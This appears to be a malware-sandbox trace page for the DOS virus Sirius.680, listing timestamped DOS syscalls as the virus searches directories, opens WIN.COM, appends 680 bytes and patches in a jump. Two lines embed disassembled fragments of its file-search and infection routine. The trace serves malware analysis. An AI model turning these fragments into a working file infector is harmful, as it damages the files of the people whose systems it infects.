Sample viewer

vx.netlux.org/Virus.DOS.Sirius.680

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:30:54.816820624Z	53	PC: 12a84 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:30:54.826395785Z	37	PC: 12a98 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:30:54.827489747Z	47	PC: 12a9d \| Get disk transfer address
2018-12-17T22:30:54.828613787Z	26	PC: 12aaf \| Set disk transfer address
2018-12-17T22:30:54.830220846Z	25	PC: 12ab3 \| Get default drive
2018-12-17T22:30:54.837761851Z	71	PC: 12ac0 \| Get current directory
2018-12-17T22:30:54.840618706Z	14	PC: 12ad6 \| Set default drive (Drive = 'C')
2018-12-17T22:30:54.841845445Z	59	PC: 12c68 \| Change current directory
2018-12-17T22:30:54.846574513Z	44	PC: 12add \| Get time 0x12add: shr dl, 1 0x12adf: shr dl, 1 0x12ae1: add dl, 0x40 0x12ae4: mov byte ptr [bp + 0x244], dl 0x12ae8: xor bx, bx 0x12aea: mov ah, 0x4e 0x12aec: lea dx, word ptr [bp + 0x244] 0x12af0: mov cx, 0x11 0x12af3: int 0x21 0x12af5: jae 0x12b13 0x12af7: mov al, byte ptr [bp + 0x244] 0x12afb: inc al 0x12afd: cmp al, 0x90 0x12aff: jbe 0x12b03 0x12b01: sub al, 0x26 0x12b03: mov byte ptr [bp + 0x244], al 0x12b07: inc bh 0x12b09: cmp bh, 0x1b 0x12b0c: je 0x12ac0 0x12b0e: jmp 0x12aea
2018-12-17T22:30:54.848820477Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.854273128Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.8658981Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.870925738Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.875855148Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.881285011Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.88628298Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.892631157Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.898125054Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.903971928Z	78	PC: 12af5 \| Find first file
2018-12-17T22:30:54.909043306Z	59	PC: 12b1a \| Change current directory
2018-12-17T22:30:54.917684784Z	78	PC: 12b25 \| Find first file
2018-12-17T22:30:54.926011065Z	67	PC: 12b83 \| Get or set file attributes
2018-12-17T22:30:54.931536463Z	67	PC: 12b90 \| Get or set file attributes
2018-12-17T22:30:55.275085289Z	61	PC: 12b98 \| Open file (Filename = 'WIN.COM')
2018-12-17T22:30:55.281917829Z	87	PC: 12b9e \| Get or set file date and time
2018-12-17T22:30:55.284044066Z	44	PC: 12bb1 \| Get time 0x12bb1: add dx, bp 0x12bb3: or dx, dx 0x12bb5: je 0x12bad 0x12bb7: mov word ptr [bp + 0x299], dx 0x12bbb: mov ah, 0x3f 0x12bbd: lea dx, word ptr [bp + 0x23b] 0x12bc1: mov cx, 3 0x12bc4: int 0x21 0x12bc6: mov ax, 0x4202 0x12bc9: xor cx, cx 0x12bcb: cdq 0x12bcc: int 0x21 0x12bce: sub ax, 3 0x12bd1: mov word ptr cs:[0xfa79], ax 0x12bd5: mov byte ptr cs:[0xfa78], 0xe9 0x12bdb: lea si, word ptr [bp - 5] 0x12bde: nop 0x12bdf: mov di, 0xfb2c 0x12be2: mov cx, 0x2a8 0x12be5: cld
2018-12-17T22:30:55.286599736Z	63	PC: 12bc6 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:30:55.292478991Z	66	PC: 12bce \| Move file pointer
2018-12-17T22:30:55.294308435Z	64	PC: 12bf8 \| Write file or device (Write 680 bytes on handle 5)
2018-12-17T22:30:55.301526397Z	66	PC: 12c00 \| Move file pointer
2018-12-17T22:30:55.302979113Z	64	PC: 12c0a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:30:55.30496238Z	87	PC: 12c1f \| Get or set file date and time
2018-12-17T22:30:55.306532946Z	62	PC: 12c23 \| Close file
2018-12-17T22:30:55.313809835Z	67	PC: 12c30 \| Get or set file attributes
2018-12-17T22:30:55.323500194Z	14	PC: 12c72 \| Set default drive (Drive = 'A')
2018-12-17T22:30:55.325181223Z	59	PC: 12c68 \| Change current directory
2018-12-17T22:30:55.330771618Z	59	PC: 12c7a \| Change current directory
2018-12-17T22:30:55.332866733Z	37	PC: 12c49 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:30:55.334419208Z	26	PC: 12c59 \| Set disk transfer address